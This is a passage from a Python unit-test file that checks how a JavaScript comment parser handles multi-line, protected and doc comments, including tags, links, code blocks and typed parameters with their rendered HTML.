parsed = self.process('''/* Multi Comment */''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "multi")
self.assertEqual(parsed.comments[0].text, "Multi Comment")
def test_multi_two(self):
parsed = self.process('''
/* Multi Comment1 */
/* Multi Comment2 */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 2)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, "Multi Comment1")
self.assertEqual(parsed[0].comments[1].variant, "multi")
self.assertEqual(parsed[0].comments[1].text, "Multi Comment2")
def test_multi_multiline(self):
parsed = self.process('''
/* Multi
Comment
Test */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, " Multi\n Comment\n Test")
def test_multi_multiline_otherbreaks(self):
parsed = self.process('''
/*
Multi
Comment
Test
*/
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].text, " Multi\n Comment\n Test")
#
# MULTI COMMENTS :: CONTEXT
#
def test_multi_context_inline(self):
parsed = self.process('''multiCommentCmd(); /* Multi Inline Comment */''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_multi_context_inline_multiline(self):
parsed = self.process('''
multiCommentCmd(); /*
Multi Inline Comment
*/''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "inline")
def test_multi_context_block_before(self):
parsed = self.process('''
multiCommentCmd();
/* Multi Block Comment */
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_multi_context_block_after(self):
parsed = self.process('''
/* Multi Block Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "block")
def test_multi_context_section(self):
parsed = self.process('''
/* Multi Section Comment */
multiCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "multi")
self.assertEqual(parsed[0].comments[0].context, "section")
#
# PROTECTED COMMENTS
#
def test_protected(self):
parsed = self.process('''
/*! Protected Comment */
protectedCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "protected")
self.assertEqual(parsed[0].comments[0].text, "Protected Comment")
def test_protected_newline(self):
parsed = self.process('''
/*!
Protected Comment
*/
protectedCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "protected")
self.assertEqual(parsed[0].comments[0].text, "Protected Comment")
def test_protected_jquery(self):
parsed = self.process('''
/*!
* jQuery JavaScript Library v@VERSION
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: @DATE
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "protected")
self.assertEqual(parsed.comments[0].text, "jQuery JavaScript Library v@VERSION\nhttp://jquery.com/\n\nCopyright 2011, John Resig\nDual licensed under the MIT or GPL Version 2 licenses.\nhttp://jquery.org/license\n\nIncludes Sizzle.js\nhttp://sizzlejs.com/\nCopyright 2011, The Dojo Foundation\nReleased under the MIT, BSD, and GPL Licenses.\n\nDate: @DATE")
#
# ATTACHMENT
#
def test_missing_node(self):
parsed = self.process('''
/** Root Doc */
core.Class("xxx", {
members : {
foo : function() {
/** TODO */
}
}
/** END */
})
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].text, "Root Doc")
#
# DOC COMMENTS
#
def test_doc(self):
parsed = self.process('''
/** Doc Comment */
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_unbound(self):
parsed = self.process('''
/** Doc Comment */
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "doc")
self.assertEqual(parsed.comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed.comments[0].text, "Doc Comment")
def test_doc_unbound_nobreak(self):
parsed = self.process('''/** Doc Comment */''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
self.assertEqual(parsed.comments[0].variant, "doc")
self.assertEqual(parsed.comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed.comments[0].text, "Doc Comment")
def test_doc_multiline(self):
parsed = self.process('''
/**
* Doc Comment
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_multiline_three(self):
parsed = self.process('''
/**
* Doc Comment Line 1
* Doc Comment Line 2
* Doc Comment Line 3
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3")
def test_doc_multiline_clean(self):
parsed = self.process('''
/**
Doc Comment
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment")
def test_doc_multiline_clean_three(self):
parsed = self.process('''
/**
Doc Comment Line 1
Doc Comment Line 2
Doc Comment Line 3
*/
docCommentCmd();
''')
self.assertEqual(parsed[0].type, "semicolon")
self.assertEqual(isinstance(parsed[0].comments, list), True)
self.assertEqual(len(parsed[0].comments), 1)
self.assertEqual(parsed[0].comments[0].variant, "doc")
self.assertEqual(parsed[0].comments[0].getHtml(), "<p>Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3</p>\n")
self.assertEqual(parsed[0].comments[0].text, "Doc Comment Line 1\nDoc Comment Line 2\nDoc Comment Line 3")
#
# DOC COMMENTS :: RETURN
#
def test_doc_return(self):
parsed = self.process('''
/**
* {Number} Returns the sum of x and y.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Returns the sum of x and y.</p>\n")
self.assertEqual(comment.text, "Returns the sum of x and y.")
self.assertEqual(comment.returns[0]["name"], "Number")
def test_doc_return_twotypes(self):
parsed = self.process('''
/**
* {Number | String} Returns the sum of x and y.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Returns the sum of x and y.</p>\n")
self.assertEqual(comment.text, "Returns the sum of x and y.")
self.assertEqual(comment.returns[0]["name"], "Number")
self.assertEqual(comment.returns[1]["name"], "String")
#
# DOC COMMENTS :: TAGS
#
def test_doc_tags(self):
parsed = self.process('''
/**
* Hello World
*
* #deprecated #public #use(future) #use(current)
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), "<p>Hello World</p>\n")
self.assertEqual(comment.text, "Hello World")
self.assertEqual(comment.tags["deprecated"], True)
self.assertEqual(comment.tags["public"], True)
self.assertEqual(type(comment.tags["use"]), set)
self.assertEqual("future" in comment.tags["use"], True)
self.assertEqual("current" in comment.tags["use"], True)
self.assertEqual("xxx" in comment.tags["use"], False)
def test_doc_tags_clean(self):
parsed = self.process('''
/**
* #deprecated #public #use(future) #use(current)
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.text, "")
self.assertEqual(comment.tags["deprecated"], True)
self.assertEqual(comment.tags["public"], True)
self.assertEqual(type(comment.tags["use"]), set)
self.assertEqual("future" in comment.tags["use"], True)
self.assertEqual("current" in comment.tags["use"], True)
self.assertEqual("xxx" in comment.tags["use"], False)
#
# DOC COMMENTS :: LINKS
#
def test_doc_links(self):
parsed = self.process('''
/**
* Link to cool {z.core.Style} class. Looks at this method {core.io.Asset#toUri} to translate local
* asset IDs to something usable in the browser.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Link to cool <a href="#z.core.Style"><code>z.core.Style</code></a> class. Looks at this method <a href="#core.io.Asset~toUri"><code>core.io.Asset#toUri</code></a> to translate local\nasset IDs to something usable in the browser.</p>\n')
self.assertEqual(comment.text, 'Link to cool z.core.Style class. Looks at this method core.io.Asset#toUri to translate local\nasset IDs to something usable in the browser.')
def test_doc_links_primitive(self):
parsed = self.process('''
/**
* You can either use {String} or {Map} types as primitive data types.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>You can either use <a href="#String"><code>String</code></a> or <a href="#Map"><code>Map</code></a> types as primitive data types.</p>\n')
self.assertEqual(comment.text, 'You can either use String or Map types as primitive data types.')
def test_doc_links_type(self):
parsed = self.process('''
/**
* Just execute the {member:#update} method to fire the event {event:#update}.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Just execute the <a href="#member:~update"><code>update</code></a> method to fire the event <a href="#event:~update"><code>update</code></a>.</p>\n')
self.assertEqual(comment.text, 'Just execute the update method to fire the event update.')
def test_doc_links_object_alike(self):
parsed = self.process('''
/**
* {event:foo} an foo event that looks like a json structure.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p><a href="#foo"><code>foo</code></a> an foo event that looks like a json structure.</p>\n')
self.assertEqual(comment.text, 'foo an foo event that looks like a json structure.')
#
# DOC COMMENTS :: Code Blocks
#
def test_doc_links_in_code_block(self):
parsed = self.process('''
/**
* Foo event example code:
*
* var e = {event:foo};
* var e = {};
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Foo event example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="p">{</span><span class="nx">event</span><span class="o">:</span><span class="nx">foo</span><span class="p">};</span>\n<span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="p">{};</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Foo event example code:\n\n var e = {event:foo};\n var e = {};')
def test_doc_params_in_code_block(self):
parsed = self.process('''
/**
* Email example code:
*
* var foo = 'hello@bla.org';
* var test = "foo@blub.net";
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Email example code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">foo</span> <span class="o">=</span> <span class="s1">\'hello@bla.org\'</span><span class="p">;</span>\n<span class="kd">var</span> <span class="nx">test</span> <span class="o">=</span> <span class="s2">"foo@blub.net"</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Email example code:\n\n var foo = \'hello@bla.org\';\n var test = "foo@blub.net";')
def test_multi_code_blocks(self):
parsed = self.process('''
/**
* Some code example:
*
* // A code block with empty lines in it
*
* if (true) {
*
* } else {
*
* }
*
* Another code block:
*
* console.log('Hello World');
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.getHtml(), '<p>Some code example:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2\n3\n4\n5\n6\n7</pre></div></td><td class="code"><div class="highlight"><pre><span class="c1">// A code block with empty lines in it</span>\n\n<span class="k">if</span> <span class="p">(</span><span class="kc">true</span><span class="p">)</span> <span class="p">{</span>\n\n<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>\n\n<span class="p">}</span>\n</pre></div>\n</td></tr></table>\n<p>Another code block:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">\'Hello World\'</span><span class="p">);</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Some code example:\n\n // A code block with empty lines in it\n\n if (true) {\n\n } else {\n\n }\n\nAnother code block:\n\n console.log(\'Hello World\');')
def test_code_blocks_in_list(self):
self.maxDiff = None
parsed = self.process('''
/**
* Some code:
*
* var e = 1;
*
* A list of things below:
*
* - __listItem__
*
* This is text and not code.
*
* // Some code
* console.log("This actually is code in the list")
*
* - __anotherListItem__
*
* More text.
*
* console.log("More code")
*
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
#print('\\n'.join(comment.getHtml().split('\n')))
#print('\\n'.join(comment.text.split('\n')))
self.assertEqual(comment.getHtml(), '<p>Some code:</p>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span class="kd">var</span> <span class="nx">e</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>\n</pre></div>\n</td></tr></table>\n<p>A list of things below:</p>\n\n<ul>\n<li><p><strong>listItem</strong></p>\n\n<p>This is text and not code.</p></li>\n</ul>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1\n2</pre></div></td><td class="code"><div class="highlight"><pre> <span class="c1">// Some code</span>\n <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"This actually is code in the list"</span><span class="p">)</span>\n</pre></div>\n</td></tr></table>\n<ul>\n<li><p><strong>anotherListItem</strong></p>\n\n<p>More text.</p></li>\n</ul>\n\n<table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">"More code"</span><span class="p">)</span>\n</pre></div>\n</td></tr></table>\n')
self.assertEqual(comment.text, 'Some code:\n\n var e = 1;\n\nA list of things below:\n\n - __listItem__\n\n This is text and not code.\n\n // Some code\n console.log("This actually is code in the list")\n\n- __anotherListItem__\n\n More text.\n\n console.log("More code")')
#
# DOC COMMENTS :: PARAMS
#
def test_doc_params(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {Number} is bigger than @y {Number}. The optional @cache {Boolean?false} controls whether caching should be enabled.
* Also see @extra {String | Array ?} which is normally pretty useless
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>. The optional <code class="param">cache</code> controls whether caching should be enabled.\nAlso see <code class="param">extra</code> which is normally pretty useless</p>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y. The optional cache controls whether caching should be enabled.\nAlso see extra which is normally pretty useless')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "Array")
self.assertEqual(comment.params["cache"]["type"][0]["builtin"], True)
self.assertEqual(comment.params["extra"]["type"][0]["builtin"], True)
self.assertEqual(comment.params["extra"]["type"][1]["builtin"], True)
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertIn("optional", comment.params["cache"])
self.assertIn("optional", comment.params["extra"])
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_dynamic(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number...} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_dynamic_default(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number...?0} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][0]["builtin"], True)
self.assertTrue(comment.params["number"]["optional"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertEqual(comment.params["number"]["default"], "0")
def test_doc_params_dynamic_multi(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number|Integer...} parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][1]["name"], "Integer")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_dynamic_multi_spacey(self):
parsed = self.process('''
/**
* {Number} Returns the sum of all given @number {Number | Integer ... } parameters.
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["number"]), dict)
self.assertEqual(comment.params["number"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["number"]["type"][1]["name"], "Integer")
self.assertNotIn("optional", comment.params["number"])
self.assertTrue(comment.params["number"]["dynamic"])
self.assertNotIn("default", comment.params["number"])
def test_doc_params_namespaced(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {core.Number} is bigger than @y {core.Number}. The optional @cache {core.Boolean?false} controls whether caching should be enabled.
* Also see @extra {core.String | core.Array ?} which is normally pretty useless
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>. The optional <code class="param">cache</code> controls whether caching should be enabled.\nAlso see <code class="param">extra</code> which is normally pretty useless</p>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y. The optional cache controls whether caching should be enabled.\nAlso see extra which is normally pretty useless')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "core.Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "core.Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "core.Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "core.String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "core.Array")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["cache"]["optional"], True)
self.assertEqual(comment.params["extra"]["optional"], True)
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_lazytypes(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x is bigger than @y.
*
* Parameters:
*
* - @x {Number}
* - @y {Number}
* - @cache {Boolean?false}
* - @extra {String | Array ?}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n<li><code class="param">cache</code></li>\n<li><code class="param">extra</code></li>\n</ul>\n')
self.assertEqual(comment.text, 'Returns whether x is bigger than y.\n\nParameters:\n\n- x\n- y\n- cache\n- extra')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(type(comment.params["cache"]), dict)
self.assertEqual(type(comment.params["extra"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["cache"]["type"][0]["name"], "Boolean")
self.assertEqual(comment.params["extra"]["type"][0]["name"], "String")
self.assertEqual(comment.params["extra"]["type"][1]["name"], "Array")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["cache"]["optional"], True)
self.assertEqual(comment.params["extra"]["optional"], True)
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
self.assertEqual(comment.params["cache"]["default"], "false")
self.assertNotIn("default", comment.params["extra"])
def test_doc_params_firstloose(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {String ? 13} is bigger than @y.
*
* Parameters:
*
* - @x {Number}
* - @y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '''<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n</ul>\n''')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertNotIn("optional", comment.params["x"])
self.assertNotIn("optional", comment.params["y"])
self.assertNotIn("default", comment.params["x"])
self.assertNotIn("default", comment.params["y"])
def test_doc_params_firstwin(self):
parsed = self.process('''
/**
* {Boolean} Returns whether @x {Number ? 13} is bigger than @y.
*
* Parameters:
*
* - @x
* - @y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Returns whether <code class="param">x</code> is bigger than <code class="param">y</code>.</p>\n\n<p>Parameters:</p>\n\n<ul>\n<li><code class="param">x</code></li>\n<li><code class="param">y</code></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["x"]), dict)
self.assertEqual(type(comment.params["y"]), dict)
self.assertEqual(comment.params["x"]["type"][0]["name"], "Number")
self.assertEqual(comment.params["y"]["type"][0]["name"], "Number")
self.assertTrue(comment.params["x"]["optional"])
self.assertNotIn("optional", comment.params["y"])
self.assertEqual(comment.params["x"]["default"], "13")
self.assertNotIn("default", comment.params["y"])
def test_doc_params_maps(self):
parsed = self.process('''
/**
* Additional arguments can be passed in via @options {Object?}:
*
* - @options.x {String}
* - @options.y {Number}
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
self.assertEqual(comment.variant, "doc")
self.assertEqual(comment.getHtml(), '<p>Additional arguments can be passed in via <code class="param">options</code>:</p>\n\n<ul>\n<li><code class="param">options.x</code></li>\n<li><code class="param">options.y</code></li>\n</ul>\n')
self.assertEqual(type(comment.params), dict)
self.assertEqual(type(comment.params["options"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]), dict)
self.assertEqual(comment.params["options"]["type"][0]["name"], "Object")
self.assertEqual(type(comment.params["options"]["fields"]["x"]), dict)
self.assertEqual(type(comment.params["options"]["fields"]["y"]), dict)
self.assertEqual(comment.params["options"]["fields"]["x"]["type"][0]["name"], "String")
self.assertEqual(comment.params["options"]["fields"]["y"]["type"][0]["name"], "Number")
def test_doc_params_maps_multi_levels(self):
parsed = self.process('''
/**
* Additional arguments can be passed in via @options {Object?}:
*
* - @options {Object}
*
* - @options.x {String}
* - @options.y {Number}
*
* - @options.foo {Object}
*
* - @options.foo.x {String}
* - @options.foo.y {Number}
*
*/
''')
self.assertEqual(parsed.type, "script")
self.assertEqual(isinstance(parsed.comments, list), True)
self.assertEqual(len(parsed.comments), 1)
comment = parsed.comments[0]
